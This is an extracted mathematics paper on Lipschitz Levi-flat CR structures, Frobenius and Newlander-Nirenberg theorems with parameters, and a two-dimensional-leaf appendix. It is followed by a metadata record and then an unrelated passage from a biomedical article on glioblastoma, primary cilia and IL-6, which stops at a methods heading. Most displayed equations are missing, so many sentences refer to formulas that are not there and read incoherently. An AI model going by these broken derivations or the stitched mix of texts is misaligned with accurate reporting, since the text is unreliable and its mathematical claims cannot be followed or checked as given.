In fact, this result is a special case of Corollary 4.1 of [Ha]. We make some further comments on it. If F t Y j denotes the flow generated by Y j , we see that and inductively (2.10) The order can be changed, and we have Conversely, once one knows that (2.11) follows from (2.6), one can prove Proposition 2.1. However, this implication is less straightforward for Lipschitz vector fields than it is for smooth vector fields. In connection with this, we mention the following analytical point, which plays a key role in the proof in [Ha]. Namely, let {J ε : 0 < ε ≤ 1} be a Friedrichs mollifier and let Y i , Y j be Lipschitz vector fields satisfying (2.6). Then, as ε → 0, locally uniformly on O. Actually this is a reformulation (of a special case) of Proposition 5.3 of [Ha]. It is stronger and more useful than the obvious fact that such convergence holds weak * in L ∞ . What is behind it is the more general fact that, for any two Lipschitz vector fields X and Y on O, locally uniformly on O. This follows from the fact that locally uniformly on O, and since clearly J ε f → f locally uniformly on O this in turn is equivalent to the fact that locally uniformly on O, which is a standard Friedrichs-type commutator estimate. We record that y(t, x) has extra regularity in t.
Recall that we are in a coordinate system in which (2.4) holds, with Y # i (p 0 ) = 0, p 0 = 0. For z close to 0 in R n−k and |t| < δ, we define where we set Proof. We want to show that if (t, z) and (s, w) are distinct points in a small neighborhood of (0, 0), then x 1 = G(t, z) and x 2 = G(s, w) are not too close. Note that Comparing (2.20)-(2.22) yields as desired.
The pull-back of a Levi-flat CR structure
In §2 we constructed a bi-Lipschitz map taking sets z = z 0 to leaves of the foliation whose tangent space is the involutive Now we take k = 2m and suppose there is a complex structure on E, J ∈ End(E). We pull this back to a complex structure J 0 ∈ End(E 0 ), examine its regularity, and show that if J is formally integrable then so is J 0 . Since Lipschitz sections of E are given as linear combinations over Lip(U 1 ) of the vector fields Y 1 , . . . , Y k , the action of J is given by We can make various hypotheses on the regularity of J. For example, we might assume or we might make the weaker hypothesis for some r ∈ (1/2, 1). In any case, the complex structure induced on E 0 is given by It is clear that the latter provided 0 < r < 1.
We next discuss integrability conditions. One approach would be to form the "Nijenhuis" tensor, associated to J by for Lipschitz sections X and Y of E. If J is Lipschitz, then (3.7) belongs to L ∞ (U 1 ). If J satisfies (3.4) with r > 1/2, then by Lemma 1.2 of [HT], the right side of (3.7) is a distribution, belonging to C r−1 * (U 1 ). Now such a singular distribution does not necessarily pull back well under a bi-Lipschitz map. Instead, we will work on individual leaves.
We start by defining N 0 In light of this, the following is useful.
The Newlander-Nirenberg theorem with parameters
The Newlander-Nirenberg theorem provides local holomorphic coordinates on a manifold Ω with an almost complex structure satisfying the formal integrability condition that its Nijenhuis tensor vanishes. In the setting of a relatively smooth almost complex structure J the smooth dependence of such coordinate functions on J was noted in [NN] and played a role in [Ni]. Here we aim to examine the dependence of such coordinates on J, in appropriate function spaces, in the context of the lower regularity hypotheses made here. Verifying this regularity will involve giving a review of the method of construction of holomorphic coordinates introduced in [M], with modifications as in [HT] to handle the still weaker regularity hypotheses made here.
Given p 0 ∈ Ω, take coordinates x = (x 1 , . . . , x 2m ), centered at p 0 , with respect to which The condition for a function f , defined near p 0 , to be holomorphic, is that f be annihilated by the vector fields and in light of (4.1) we have J(∂/∂x j ) = ∂/∂x j+m + 2m ℓ=1 c jℓ ∂/∂x ℓ with c jℓ (0) = 0 (p 0 = 0). Setting y j = x j+m , ∂/∂z j = (1/2)(∂/∂x j − i∂/∂y j ), ∂/∂z j = (1/2)(∂/∂x j + i∂/∂y j ), we can write these complex vector fields as Next, by a device similar to that used in (2.2)-(2.4), we can take linear combinations of these vector fields to obtain If J is of class C r , then the coefficients in (4.3) and (4.4) are also of class C r . The formal integrability condition is that the Lie brackets [X j , X ℓ ] are all linear combinations of X 1 , . . . , X m . If J ∈ C 1 , then [X j , X ℓ ] is a linear combination with continuous coefficients. If J ∈ C r with r > 1/2, then the Lie brackets are still well defined, and the coefficients are distributions of class C r−1 * . In such a case, it follows that the brackets [Z j , Z ℓ ] are linear combinations of Z 1 , . . . , Z m , which forces It is convenient to use matrix notation. Set A j = (a j1 , . . . , a jm ) (a row vector), A = (a jℓ ), F = (f 1 , . . . , f m ) (a row vector), and ∂/∂z = (∂/∂z 1 , . . . , ∂/∂z m ) t (a column vector). The condition that f 1 , . . . , f m be J-holomorphic is that and the formal integrability condition (4.5) is The proof of the Newlander-Nirenberg theorem consists of the construction of F , mapping a neighborhood of p 0 in Ω diffeomorphically onto a neighborhood of 0 in C m , and solving (4.6).
Malgrange's method constructs F as a composition (4.8) Different techniques are applied to construct the diffeomorphisms G and H. We run through these constructions, paying particular attention to the dependence on the matrix A. The Cauchy-Riemann equations (4.6) transform to or equivalently The formal integrability condition (4.7) implies the corresponding formal integrability of the new Cauchy-Riemann equations, i.e., where B j are the rows of B, 1 ≤ j ≤ m. Furthermore, if B satisfies (4.11), then the actual integrability, i.e., the existence of a diffeomorphism G satisfying (4.9), is equivalent to the actual integrability of J, i.e., the existence of a diffeomorphism F satisfying (4.6).
A key idea of [M] to guarantee the existence of a diffeomorphism G satisfying (4.9) is to construct H in such a fashion that if B is defined by (4.11) then Equivalently, the task is to construct a diffeomorphism H on a neighborhood U of p 0 = 0 in C m such that, if B is defined by (4.11), then (4.13) holds. It is convenient to dilate the z-variable, so that A(z) in (4.11) is replaced by A t (z) = A(tz), and we solve on the unit ball, which we denote U , for sufficiently small positive t. Note that if A ∈ C r * and A(0) = 0, then A t C r * (U ) → 0 as t → 0. If we relabel A t as A, we want to establish the following variant of Lemma 3.2 of [HT]. To state it, let us set (4.14) A r (η) = A ∈ C r * (U ) : A(0) = 0, A C r (U ) < η .
and such that B ∈ C r * (U), defined by (4.11), satisfies (4.13), and B L ∞ (U) < ε. Furthermore, H is obtained as a C 1 map where A r (η) is as in (4.14) and (4.20) , an application of the chain rule gives Using the identity [HT] (extended to function spaces on bounded domains) that In fact H → Ψ(H, A) is given by a nonlinear second order differential operator: where a j and b j are smooth in their arguments. We note that if Hence (4.29) Ψ(id, 0) = 0, and (4.30) The map (4.30) has a right inverse where G denotes the solution operator to If A ∈ A r (η) satisfies the formal integrability condition (4.7) and we construct H according to Proposition 4.1, defining B by (4.11), then B satisfies both (4.12) and (4.13). This is an overdetermined elliptic system (if ε is small enough), which we will write as The a priori regularity we have on B from (4.11) is where O ⊂ H −1 (U). As shown in Lemma 4.1 of [HT], having this a priori information with r > 1/2 allows us to obtain for each N < ∞. Then classical results yield Once we have this (as [M] noted), producing a diffeomorphism G such that (4.9) holds, which amounts to proving the Newlander-Nirenberg theorem in the real analytic setting, is amenable to classical techniques for solving real analytic systems of partial differential equations. A self contained treatment of a complex Frobenius theorem in the real analytic category, which will produce such a construction, is presented in Appendix A of this paper.
Having described how to obtain the holomorphic coordinate system (4.8), we want to examine how it depends on A. So we pick (4.38) with r > 1/2 and η > 0 sufficiently small, and turn to the task of estimating, in turn (with obvious notation), The assertion from Proposition 4.1 that the map (4.17) is C 1 leads immediately to our first estimate: (4.39) We also have a C 1 map in light of the formula (4.11). Hence (4.41) where O is a neighborhood of 0 containing H −1 (U) for all H as in (4.16). Consequently (4.42) Let us write We have (4.44) Putting together (4.43)-(4.45), using the estimates (4.41)-(4.42), we obtain (4.46) , 1 2 < ρ, s < 1.
(It is convenient to replace r by ρ in our use of (4.45) and to replace r by s in our use of (4.42) and (4.44). Typically we will want to take ρ as large as possible and s as small as possible.) The estimate (4.46) is a relatively weak estimate, a consequence of the rather rough dependence of B • K on K. Fortunately, (4.46) can be improved substantially via use of the fact that B 1 and B 2 both satisfy the elliptic system (4.34).
In fact, as one sees from (4.12)-(4.13), a α (B) = a 0 α + M α B, with M α a linear map, and hence V solves the linear elliptic system (with real analytic coefficients) The estimates (4.37) hold for B 1 and B 2 . Local elliptic regularity results yield (4.49) Then the method of solving (4.9) covered in Appendix A gives (4.50) Under the bounds on H j in C 1+r and on G j in C N produced above, we have, for U b ⊂⊂ U, r ∈ (1/2, 1), and (4.53)
Hence
(4.54) given 1/2 < r, s, ρ < 1. For the last inequality, we have used (4.46). As in that estimate, we typically want to take ρ as large as possible and s as small as possible.
Structure of Levi-flat CR-manifolds
In this section we assume S is a Lipschitz subbundle of CT Ω, satisfying (5.1) S p ∩ S p = 0, ∀ p ∈ Ω.
Hence S p + S p has constant dimension (say k), and so does E p , defined by (1.6). It follows that E and S + S are Lipschitz vector bundles, and of course V = 0. The bundle E ⊂ T Ω gets a complex structure (5.2) J ∈ Lip(Ω, End E),
and (5.3)
We make the involutivity hypotheses (1.1)-(1.2). As explained in the introduction, this is equivalent to the hypothesis that E is involutive plus the hypothesis that the Nijenhuis tensor of J vanishes. A manifold Ω with such a structure (E, J) is said to be a Levi-flat CR-manifold.
In Given the regularity of X and Z, we see that Zf is a well defined distribution for any f ∈ L 2 loc (O). Our goal here is to construct a rich class of CR functions f having the regularity given s < 1/2. In fact f and Xf will have further regularity along the leaves of the foliation tangent to E, as will be explained below.
To begin the construction of such CR functions, we implement the results of § §2-3. For any p ∈ Ω, there are a neighborhood U 1 of p, a neighborhood U 0 of 0 ∈ R n (n = dim Ω) and a bi-Lipschitz map G : U 0 → U 1 , pulling E back to the bundle E # spanned by ∂/∂t 1 , . . . ∂/∂t k , where in U 0 ⊂ R k × R n−k we have coordinates (t, z) = (t 1 , . . . , t k , z 1 , . . . , z n−k ). Furthermore, Lipschitz sections of E are transformed to Lipschitz vector fields on U 0 , and J is transformed to We may as well assume U 0 = U ′ 0 × U ′′ 0 , where U ′ 0 is a neighborhood of 0 ∈ R k and U ′′ 0 a neighborhood of 0 ∈ R n−k . Then J 0 = J 0 (z) is effectively a family of integrable almost complex structures on U ′ 0 , parametrized by z ∈ U ′′ 0 . Of course k is even; say k = 2m. Now we can apply the results of §4. We construct holomorphic functions F = (f 1 , . . . , f m ) on U ′ 0 , depending on z as a parameter, say F = F z : U ′ 0 → C m , z ∈ U ′′ 0 . (Note that z has a different role here than in §4; this should not cause confusion.) We construct F z as a composition: The family of diffeomorphisms H z is constructed in Proposition 4.1, via an implicit function theorem. Perhaps after shrinking U ′ 0 and U ′′ 0 , we have H z ∈ C 1+r (U ′ 0 ) for each z ∈ U ′ 0 , given r < 1, and if 1/2 < r < 1. Here we have used (5.10) As explained in §4, the construction of G z follows from the real-analytic version of the Newlander-Nirenberg theorem, a presentation of which is given here, in Appendix A. Then we obtain F z = G z • H z , and, by (4.54), with given 1/2 < r, s, ρ < 1. Here we pick ρ = 1 − ε, s = 1/2 + ε, and use (5.10) to obtain given r ∈ (1/2, 1), and taking ε (hence δ) sufficiently small. The functions f j (t, z) given by F z (t) = (f 1 (t, z), . . . , f m (t, z)) are CR functions on U 0 . In addition, the functions ϕ j (t, z) = z j , 1 ≤ j ≤ n − k, are CR functions on U 0 . Then (5.13) Φ(t, z) = (f 1 (t, z), . . . , f m (t, z), z 1 , . . . , z n−k ) gives a Hölder continuous homeomorphism of U 0 (possibly shrunken some more) onto an open subset of C m × R n−k . We compose with G −1 to get associated CR functions on U 1 ⊂ Ω. Let us formally record the result.
Proposition 5.1. Given Ω with a Lipschitz, Levi-flat CR structure, p ∈ Ω, there exists a neighborhood U 1 of p and a homeomorphism (5.14) Φ : whose components are CR functions ϕ 1 , . . . , ϕ m+n−k on U 1 . We have for any s < 1/2. Furthermore, Φ is a C 1+r -embedding of each leaf in U 1 , tangent to E, into C m × R n−k , for each r < 1.
Remark. Note that if ψ is a smooth function on a neighborhood of the range of Φ in C m ×R n−k and if ψ is holomorphic in the C m -variables, then ψ(ϕ 1 , . . . , ϕ m+n−k ) is a CR function on U 1 .
If dim S p = 1, so k = 2 and the leaves tangent to E are 2-dimensional, then we can use the results of Appendix B in place of those of §4. Consequently we can improve the regularity result (5.15) to where, given a > 0, for 0 < δ ≤ 1. We now give a sufficient condition for the existence of a CR embedding Φ as in (5.14) that is a C 1 diffeomorphism.
Proposition 5.2.
Assume Ω is a Levi-flat CR manifold with a CR structure regular of class C ρ , with ρ > 3/2. Then the map Φ in (5.14) can be taken to be a C 1 diffeomorphism.
Proof. The new regularity hypothesis is that S is a C ρ bundle. Thus E and J are regular of class C ρ , and these structures pull back to C ρ structures under the map G, which is a C ρ diffeomorphism. In particular, A(t, z) is a C 1 function of z with values in C s (U ′ 0 ), with s = ρ − 1 > 1/2. Thus the implicit function theorem argument of Proposition 4.1 yields H z , a C 1 function of z with values in C 1+s . From here, one obtains C 1 dependence of G z on z and the result follows.
Note that if the leaves tangent to E are 2-dimensional, we can obtain the conclusion of Proposition 5.2 whenever ρ > 1, again using the results of Appendix B in place of those of §4.
Remarks on the embedded case. Suppose Ω ⊂ C N is a C 1,1 submanifold, of real dimension d, and that T p Ω ∩ JT p Ω = E p has constant real dimension k = 2m, so Ω has the structure of a CR-manifold. The vector bundle E ⊂ T Ω is a Lipschitz vector bundle, and the condition that E be involutive is equivalent to the condition that Ω is a Levi-flat CR-manifold. In such a case, the results of §2 imply that Ω is foliated by manifolds, of real dimension k, tangent to E, and smooth of class C 1,1 .
In this case one does not need the Newlander-Nirenberg theorem (or a refinement) to establish that these leaves are complex manifolds. Rather methods going back to Levi-Civita [LC], and developed further in [Som], [Fr], and [Pin] suffice. Levi-Civita's result for a single leaf is: Proof. Fix p ∈ M , and represent M near p as the graph over the complex vector In the setting above, we have a family M z of leaves, depending in a Lipschitz fashion of z ∈ U ⊂ R ℓ , where d = ℓ+k. Given p ∈ Ω, say p ∈ M z 0 , pick V = T p M z 0 , and for z close to z 0 we have M z locally a graph over O ⊂ V . The comments above give local holomorphic diffeomorphisms G z : O → M z ⊂ C N . This construction, as we have said, is essentially classical. The one point to make here is that we have the Frobenius theory of [Ha], so we are able to treat submanifolds of class C 1,1 while previous treatments take Ω to be of class C 2 . In connection with this, we note that Theorem 2.1 of [Pin] refers to CR-manifolds in C N of class C m , with m ≥ 1, but a perusal of the proof shows that the author means to say the relevant tangent spaces are smooth of class C m , which holds if Ω ⊂ C N is a submanifold of class C m+1 (satisfying the CR property).
The complex Frobenius theorem
We recall our set-up. We have a Lipschitz bundle S ⊂ CT Ω, we assume S + S is also a Lipschitz bundle, and we assume that We then form the Lipschitz bundles V ⊂ E ⊂ T Ω, with fibers which therefore satisfy Furthermore, we have a complex structure on E/V, Our proximate goal is to construct a Levi-flat CR manifold as a quotient (locally) of Ω, via the action of a local group of flows generated by sections of V. In order to achieve this, we need a further hypothesis on the regularity with which V sits in E. One way to put it is the following. Say dim V p = ℓ ≤ k = dim E p .
Hypothesis V. Each p ∈ Ω has a neighborhood U 1 on which there is a local Lipschitz frame field {X 1 , . . . , X k } for E, such that {X 1 , . . . , X ℓ } is a local frame field for V and Later we will give other conditions that imply Hypothesis V, but for now we show how it leads to the desired quotient space.
With respect to such a local frame field, for x ∈ U 1 we can identify E x /V x with the linear span of X ℓ+1 (x), . . . , X k (x), and we can represent J by a (k − ℓ) × (k − ℓ) matrix: for 1 ≤ i ≤ ℓ, ℓ + 1 ≤ j ≤ k, by (6.1) and (6.6). Taking Y j to be the sum in (6.7), and noting that (6.9) again by (6.6), we deduce that (6.9) actually vanishes, and hence (6.10) In a fashion parallel to (2.17) and (3.1), we set with X 1 , . . . , X k as in Hypothesis V. By Proposition 2.3, G : U 0 → U 1 is a bi-Lipschitz map from a neighborhood U 0 of (0, 0) ∈ R k × R n−k to a neighborhood U 1 of p ∈ Ω. We denote by V 0 ⊂ T U 0 the pull back of V, by E 0 ⊂ T U 0 the pull back of E, and by S 0 ⊂ CT U 0 the pull back of S. Note that V 0 is spanned by ∂/∂t j , 1 ≤ j ≤ ℓ and E 0 by ∂/∂t j , 1 ≤ j ≤ k. The quotient bundle E 0 /V 0 is isomorphic to the span of ∂/∂t j for ℓ + 1 ≤ j ≤ k, and the complex structure J on E/V pulls back to J 0 , given by The result (6.10) is equivalent to so we can write (6.14) At this point it is natural to form the quotient space U 0 = U 0 / ∼, where we use the equivalence relation (6.15) (t, z) ∼ (s, z) ⇐⇒ (t ℓ+1 , . . . , t k ) = (s ℓ+1 , . . . , s k ).
Note that U 1 fibers over U 0 , via where P (t 1 , . . . , t k ) = (t ℓ+1 , . . . , t k ). We will display a Levi-flat CR structure on U 0 , with E 0 the span of ∂/∂t j , ℓ + 1 ≤ j ≤ k and To see this, note that a vector field of the form can be regarded as a vector field on either U 0 or U 0 . In the latter guise it is a Lipschitz section of S 0 . The involutivity condition (6.1) has a counterpart for S 0 , which implies that the Nijenhuis tensor of J 0 vanishes, so U 0 has a Levi-flat CR structure, associated with S 0 , the span of vectors of the form (6.19). This establishes the main result of this section, which we state formally.
Proposition 6.1. Assume S and S+S are Lipschitz subbundles of CT Ω, satisfying the involutivity condition (6.1) and also Hypothesis V. Then each p ∈ Ω has a neighborhood U 1 and a Lipschitz fibration π : U 1 → U 0 onto a Levi-flat CR manifold, associated to a Lipschitz subbundle S 0 ⊂ CT U 0 , such that We show that additional regularity conditions on V and E imply Hypothesis V.
Proposition 6.2. Assume each p ∈ Ω has a neighborhood on which there is a frame field {W 1 , . . . , W k } for E, of class C 1,1 , such that {W 1 , . . . , W ℓ } is a local frame field for V. Then Hypothesis V holds.
A. A Frobenius theorem for real analytic, complex vector fields
Let X 1 , . . . , X m be real analytic, complex vector fields on an open set O ⊂ R n . We assume (A.1) [X k , X ℓ ] = 0, 1 ≤ k, ℓ ≤ m.
We want to obtain conditions under which we can find real analytic solutions u to on a neighborhood of a given point p ∈ O. We proceed as follows. Say On a neighborhood Ω of p in C n set with a kj (z) holomorphic extensions of a kj (x). Solving (A.2) is equivalent to finding a holomorphic solution u to (A.5) on a neighborhood of p in C n . Note that (A.1) implies (A.6) [Z k , Z ℓ ] = 0, 1 ≤ k, ℓ ≤ m.
Our next step involves passing to real vector fields on Ω ⊂ C n ≈ R 2n . Generally, if with f j and g j real valued, and then set If Z is a holomorphic vector field, i.e., if (A.7) holds with a j (z) holomorphic, we say Y = ΦZ is a real-holomorphic vector field. Our first lemma holds whether or not the coefficients of Z are holomorphic. (A.6) and Y = Φ(Z), then The proof is a straightforward calculation, making use of The following is special to holomorphic vector fields, namely that Φ preserves the Lie bracket when applied to such vector fields.
Again the proof is a straightforward (though slightly tedious) calculation. It follows that if X k and Z k are as in (A.3)- (A.4), and if The complex structure on C n produces a complex structure on the space of real vector fields on Ω, defined by Note that if Z has the form (A.7), then In particular, if Y k are as in (A.13), (A.17) [Y k , JY ℓ ] = 0 = [JY k , JY ℓ ], 1 ≤ k, ℓ ≤ m.
One advantage of using the real vector fields Y k on Ω is that they generate local flows F t Y k on Ω. In this context, the following results are very useful. Suppose Y is a real-holomorphic vector field on Ω. It follows from (A.16) that so is JY , and Y and JY commute. Thus so do the local flows F s Y and F t JY . The following gives important information on how these flows fit together. Proposition A.3. If Y is a real-holomorphic vector field on Ω, then, for each z ∈ Ω, Proof. Denote the 2-parameter orbit in (A.18) by ϕ(s, t). By commutativity we also have (A.19) ϕ(s, t) = F t JY F s Y (z). It follows that (A.20) ∂ϕ ∂s = Y (ϕ(s, t)), ∂ϕ ∂t = JY (ϕ(s, t)), and hence ∂ϕ/∂t = J ∂ϕ/∂s, which gives the asserted holomorphicity.
The following is an important complement.
Proposition A.4. If Y is a real-holomorphic vector field on Ω, then F t Y is a local group of holomorphic maps.
Proof. The claim is equivalent to the assertion that where, given a diffeomorphism F , F # is the induced operator on vector fields. One has cf. (8.3) in Chapter I of [T]. Hence If Y = ΦZ with Z a holomorphic vector field, as in (A.7)-(A.9), then a calculation using shows that, for any vector field W , so the quantity (A.23) vanishes. More generally, the latter identity by (A.25). An iteration gives In particular, for all ℓ ∈ Z + , In the current context, F t Y and all its derived quantities are real analytic in t (as a consequence of Proposition A.3), so (A.21) follows from (A.28).
We proceed to find solutions to (A.2), under appropriate hypotheses. For notational simplicity, assume p is the origin; p = 0 ∈ R n ⊂ C n . Suppose (A.29) V is a linear subspace of R n , of dimension n − m, and let (A.30) V be the complexification of V, so V is a complex subspace of C n , of complex dimension n−m (hence real dimension 2n−2m). Let v be a real analytic function on a neighborhood U of 0 in V , extended to a holomorphic function on a neighborhood U of 0 in V . We assume on U . In particular, Conversely, if (A.32) holds, then (A.31) holds, possibly with U shrunken. In such a case, we can set and see that u is holomorphic on a neighborhood of 0 in C n and solves (A.34) Hence, by Lemma A.1,(A.5) holds, hence, possibly shrinking U, we have A classic example to which this construction applies arises in the real analytic case of the Newlander-Nirenberg theorem. In this setting, one has n = 2m and takes ξ j = x j + ix j+m , 1 ≤ j ≤ m, and These vector fields arise from an almost complex structure J 0 on O ⊂ R n , and the integrability condition is that they commute, i.e., that (A.1) holds. Then a function u on O is holomorphic with respect to this almost complex structure if and only if (A.2) holds, and the theorem is that if (A.1) holds then there are m such functions forming a local coordinate system, in a neighborhood of 0. In this case we have Let us take for V ⊂ R n the space (A.41) V = {x ∈ R n : x m+1 = · · · = x 2m = 0}, so (A.42) V = {x + iy ∈ C n : x m+1 = · · · = x 2m = y m+1 = · · · = y 2m = 0}, which is spanned over R by (A.43 It is clear that if Y k (0) and JY k (0) are given by (A.39)-(A.40), then (A.32) holds, so we have solutions to (A.35) in this case, for some neighborhood U of 0 in V , and arbitrary real analytic v on U. This provides enough J 0 -holomorphic functions on a neighborhood of 0 in R n to yield a coordinate system. In this fashion the real analytic case of the Newlander-Nirenberg theorem is proven.
B. The case of two-dimensional leaves
Here we put ourselves in the setting of §3, and take the Lipschitz bundle E to have fiber dimension k = 2m = 2. We assume E has a complex structure J, pulled back as in §3 to a complex structure J 0 ∈ End(E 0 ), where E 0 ⊂ T U 0 is the bundle spanned by ∂/∂t 1 , ∂/∂t 2 . Here U 0 ⊂ R n is an open set with coordinates (t, z), t ∈ R 2 , z ∈ R n−2 . We assume with r ∈ (0, 1), in which case We can represent J 0 = J 0 (t, z) as a 2 × 2 matrix valued function of (t, z). Making a preliminary change of coordinates where A(z) is a Gℓ(2, R)-valued function of the same type of regularity as J 0 in (B.2), we can arrange that In order to implement the classical method of finding isothermal coordinates, we impose a family of Riemannian metric tensors on t-space, depending on z as a parameter, (g ij (t, z)), 1 ≤ i, j ≤ 2. Arrange that J 0 (t, z) is an isometry on T t R 2 with respect to the induced inner product, for each (t, z). One could, for example, start with the standard flat metric (δ ij ) and average with respect to the Z/(4)-action generated by J 0 . We then obtain (B.5) g ij ∈ C r (U 0 ), when (B.2) holds, and we can arrange that (B.6) g ij (0, z) = δ ij .
Let D = {t ∈ R 2 : t 2 1 + t 2 2 < 1}. We want to find a harmonic function u 1 on D equal to t 1 on ∂D (and depending on the parameter z). Thus, with a ij (t, z) = g(t, z) 1/2 g ij (t, z), where (g ij ) is the inverse of the matrix (g ij ) and g its determinant, we want to solve where ∂ i = ∂/∂t i , i = 1, 2. Without changing notation, we dilate the t-coordinates, and we can assume where η > 0 is a sufficiently small quantity. Let us write (B.7) as To establish solvability of (B.9), when η in (B.8) is small enough, note that it is equivalent to the following equation for v = u 1 − t 1 : hence to the equation where G is the solution operator to the Poisson problem for ∆ on D, with the Dirichlet boundary condition. Such G has the property (B.13) G : C r−1 * (D) −→ C r+1 (D), 0 < r < 1; cf. [T], Chapter 13, (8.54)-(8.55). Hence (B.14) so if η is small enough, the operator norm of GR z on C r+1 (D) is ≤ 1/2, so I + GR z in (B.12) is invertible on C r+1 (D), and we have a unique solution v, satisfying We now have u 1 = t 1 + v. The standard construction of the harmonic conjugate u 2 , satisfying (B.16) du 2 = (J 0 ) t du 1 , u 2 (0, z) = 0, gives (B.17) u 2 − t 2 C r+1 (D) ≤ Cη, and taking u = u 1 + iu 2 , we have a local holomorphic coordinate system on each leaf z = z 0 , if η is small enough. We now want to determine how smooth u i (t, z) are in z, first in the case i = 1. So pick points z and z ′ and set w = u 1 (t, z) − u 1 (t, z ′ ). Hence An argument similar to (B.11)-(B.14) yields, for s ∈ (0, r], (B.20) w C 1+s (D) ≤ C r ij (·, z) − r ij (·, z ′ ) C s (D) u 1 (·, z ′ ) C s+1 (D) .
We obtain a CR function on an open set in U 1 by composing u = u 1 + iu 2 with the inverse of the bi-Lipschitz map G, given in (3.1): We have where {Y 1 , Y 2 } is the Lipschitz frame field for E that pulls back to {∂/∂t 1 , ∂/∂t 2 }. It follows that (B.29)ũ, Y jũ ∈ C r−δ , ∀ δ > 0.
We formally state the main conclusion of this appendix. Since the result is local, we may as well take Ω to be an open set in some Euclidean space.
Proposition B.1. Let Ω have a Lipschitz, Levi-flat CR-structure, with leaves tangent to E of real dimension two. Then each p ∈ Ω has a neighborhood U on which there is a CR-function (B.56)ũ : U −→ C, which is a holomorphic diffeomorphism on each leaf, intersected with U , into C, with the following regularity. For any a > 0, and any Lipschitz section Y of E, , for x, x ′ ∈ U, |x − x ′ | ≤ 1/2.
Remark. Since a tool in the analysis of the Lipschitz CR-structures was an analysis of families of much less regular almost complex structures, it is worth mentioning the fundamental work of Ahlfors and Bers [AB] on the endpoint case, involving merely L ∞ almost complex structures. See also [A] and [D] for treatments; the latter article also discusses dependence on parameters. In such a case the C 1 regularity collapses to Hölder continuity, and it does not seem that techniques used there lead to an improvement of Proposition B.1. | 2007-11-08T20:52:20.000Z | 2006-08-16T00:00:00.000 | {
"year": 2007,
"sha1": "d7ac596cec02afba76126957c65d9fdf1280785d",
"oa_license": null,
"oa_url": "https://www.ams.org/tran/2007-359-01/S0002-9947-06-04067-0/S0002-9947-06-04067-0.pdf",
"oa_status": "BRONZE",
"pdf_src": "Arxiv",
"pdf_hash": "0aecaf60c5217b1cfd22dc0cdbb60b7cee72b2c5",
"s2fieldsofstudy": [
"Mathematics"
],
"extfieldsofstudy": [
"Mathematics"
]
} |
266367748 | pes2o/s2orc | v3-fos-license | Glioblastoma may evade immune surveillance through primary cilia-dependent signaling in an IL-6 dependent manner
Glioblastoma is the most common, malignant primary brain tumor in adults and remains universally fatal. While immunotherapy has vastly improved the treatment of several solid cancers, efficacy in glioblastoma is limited. These challenges are due in part to the propensity of glioblastoma to recruit tumor-suppressive immune cells, which act in conjunction with tumor cells to create a pro-tumor immune microenvironment through secretion of several soluble factors. Glioblastoma-derived EVs induce myeloid-derived suppressor cells (MDSCs) and non-classical monocytes (NCMs) from myeloid precursors leading to systemic and local immunosuppression. This process is mediated by IL-6 which contributes to the recruitment of tumor-associated macrophages of the M2 immunosuppressive subtype, which in turn, upregulates anti-inflammatory cytokines including IL-10 and TGF-β. Primary cilia are highly conserved organelles involved in signal transduction and play critical roles in glioblastoma proliferation, invasion, angiogenesis, and chemoradiation resistance. In this perspectives article, we provide preliminary evidence that primary cilia regulate intracellular release of IL-6. This ties primary cilia mechanistically to tumor-mediated immunosuppression in glioblastomas and potentially, in additional neoplasms which have a shared mechanism for cancer-mediated immunosuppression. We propose potentially testable hypotheses of the cellular mechanisms behind this finding.
Introduction
Glioblastoma is the most common malignant brain tumor with mean survival of 15 months, and average 5-year survival of 6.9% (1).Despite significant effort to develop novel therapies, there has been little improvement in outcomes.The pathogenesis of glioblastoma involves myriad cellular adaptations which promote proliferation, invasion, angiogenesis, DNA repair, and immune suppression.Immunotherapies have garnered significant interest among the scientific community and have revolutionized treatment of several solid cancers.Glioblastoma is notorious for propagating an immunosuppressive tumor microenvironment (TME) through suppressing infiltrating immune cells via numerous pathways which work both locally and systemically.In the local tumor microenvironment, production of tryptophan metabolites, secretion of cytokines including IL-6 and IL-10, and an increase in membrane expression of checkpoint proteins like PD-L1 result in local immunosuppression.Contemporary evidence also implicate glioblastoma-derived extracellular vesicles (EVs) in upregulation of myeloid-derived suppressor cells (MDSCs) which contribute to systemic immunosuppression (2)(3)(4)(5).While it is known that glioblastoma generates an immunosuppressive TME, the specific alterations in gene expression and cellular signaling which trigger this immunosuppressive phenotype remain enigmatic.
Primary cilia are non-motile, microtubule-based organelles which act in key signaling pathways, e.g.EGFR (6), Shh (7), WNT (8), TGF (9) and Notch (10).The primary cilium is anchored to the plasma membrane by the basal body.The basal body is important because it acts as a template for cilia construction and repurposes itself in cell division as the mother centriole (11).The implication of this juxtaposition with the centrosome, is that the primary cilia must be disassembled before the cell can transition from the G 0 /G 1 phase to the cycling S/G 2 /M phase of mitosis (12).This "ciliary checkpoint" acts as a brake, confining the cell to the G 0 /G 1 phase.Perhaps unsurprisingly, many systemic and CNS malignancies including glioblastoma, melanoma, pancreatic, liver, and prostate cancers demonstrate reduction in primary cilia frequency, though in each of these tumors, a ciliated cell population remains (13,14).In this perspectives article, we present evidence for a potential role of primary cilia as master regulators of glioblastoma-mediated immunosuppression through the regulation of IL-6.This is a novel idea which may ultimately yield deeper understanding of the pathogenesis of glioblastoma and other cancers which all rely on this shared mechanism and may also allow for development of potentially novel and urgently needed therapeutic strategies.
Source of human glioblastoma cells and cell culture
Human glioblastoma cells (dBT114 and dBT116) were acquired from the Brain Tumor PDX National Resource Database by Sarkarias et al. from the Mayo Clinic (Mayo Clinic IRB312-003458).Cells were cultured in DMEM/F12 (Thermo Fisher Scientific, Waltham, MA) with 10% fetal bovine serum (FBS) and 1% Pen/Strep and incubated in 5% CO 2 at 37 degrees Celsius.
Protein knockdown by small interfering RNA siRNA sequences targeting KIF3A (sc-270301), CCRK (sc-92544), IFT88 (sc-75329), or a nontargeting siRNA control (sc-37007) were acquired (Santa Cruz Inc, Dallas, TX).Each siRNA product consisted of pools of 3-5 target-specific 19-25 nucleotide siRNAs designed to knock down expression of the gene of interest.Glioblastoma cells (2.5 × 10 5 ) were incubated in DMEM with 10% FBS and siRNAs were transfected using Lipofectamine RNAiMAX (Thermo Fisher Scientific) per the manufacturer's instructions.Cells were then recovered in complete medium for 24 hours, and the efficacy of gene targeting at the mRNA and protein level was assessed by qRT-PCR and western blotting, respectively.
RNA extraction and qRT-PCR
